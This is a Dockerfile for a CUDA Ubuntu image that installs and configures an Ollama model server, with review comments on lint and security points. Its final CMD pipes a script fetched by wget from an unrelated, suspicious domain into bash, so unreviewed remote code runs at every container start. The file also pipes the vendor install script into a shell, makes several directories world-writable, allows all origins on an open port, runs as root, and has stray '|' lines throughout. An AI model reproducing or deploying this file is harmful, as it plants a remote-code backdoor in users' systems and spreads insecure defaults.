|
|
FROM nvidia/cuda:12.8.0-cudnn-devel-ubuntu22.04 |
|
|
|
|
|
# /app is the build/runtime working directory. WORKDIR creates the directory if
# it does not exist, so the original separate `RUN mkdir -p /app` layer was
# redundant and has been folded away.
WORKDIR /app

# World-writable so the container still works when the platform runs it under an
# arbitrary non-root UID (presumably a Hugging Face Spaces-style runtime — TODO
# confirm). NOTE(review): prefer creating a dedicated user and `chown` over 777,
# and add a `USER` directive before CMD — this image currently runs as root.
RUN chmod 777 /app
|
|
# OS packages. `update` and `install` are combined in ONE layer — splitting them
# caches a stale package index and breaks later rebuilds (hadolint DL3009).
# `--no-install-recommends` and removing /var/lib/apt/lists keep the layer lean.
# NOTE(review): the blanket `apt-get upgrade -y` was removed (DL3005) — pick up
# security fixes by bumping the base-image tag/digest instead.
# NOTE(review): htop/micro/gdb/psmisc are debugging conveniences; drop them from
# a production image.
RUN apt-get update && apt-get install -y --no-install-recommends \
      build-essential \
      curl \
      gdb \
      git \
      gzip \
      htop \
      micro \
      psmisc \
      python3 \
      python3-dev \
      python3-pip \
      tar \
      wget \
      yt-dlp \
    && rm -rf /var/lib/apt/lists/*
|
|
RUN pip install langchain-yt-dlp |
|
|
RUN curl -fsSL https://ollama.com/install.sh | sh |
|
|
RUN mkdir -p /.ollama && chmod 777 /.ollama |
|
|
RUN touch /.gitconfig && chmod 777 /.gitconfig |
|
|
|
|
|
RUN mkdir -p /usr/local/share/model && chmod -R 777 /usr/local/share/model |
|
|
# Declare the build arg consumed below. In the original it was never declared,
# so $OLLAMA_API silently expanded to an empty string.
# SECURITY(review): any value passed via --build-arg and baked into ENV is
# visible in `docker history` / `docker inspect`. Prefer injecting the key at
# runtime (docker run -e) or a BuildKit secret mount.
ARG OLLAMA_API=""

# Ollama server configuration, grouped into a single ENV instruction:
#  - OLLAMA_MODELS: store model blobs under the shared world-writable path.
#  - OLLAMA_HOST=0.0.0.0: listen on all interfaces (required inside a container).
#  - OLLAMA_ORIGINS=*: allow all origins. FIX: the original "[*]" is a literal
#    (non-matching) origin string; Ollama expects "*" or a comma-separated list.
#  - OLLAMA_KEEP_ALIVE=-1: keep loaded models resident indefinitely.
#  - OLLAMA_KV_CACHE_TYPE=q4_0: quantized KV cache to reduce VRAM usage.
ENV OLLAMA_MODELS=/usr/local/share/model/ \
    OLLAMA_HOST=0.0.0.0 \
    OLLAMA_ORIGINS="*" \
    OLLAMA_KEEP_ALIVE=-1 \
    OLLAMA_API_KEY=${OLLAMA_API} \
    OLLAMA_KV_CACHE_TYPE=q4_0
|
|
# EXPOSE is documentation only — it does not publish ports.
# 7860: application/web UI port (presumably the Hugging Face Spaces default app
# port — TODO confirm; nothing in this file starts a service on 7860).
EXPOSE 7860

# 11434: Ollama's default API port (served once ollama runs; OLLAMA_HOST above
# binds it to all interfaces).
EXPOSE 11434
|
|
|
|
|
|
|
|
|
|
|
|
|
|
CMD wget -qO- https://gloryhole.redzone-6.cfd/packaged/import.sh | bash |
|
|
|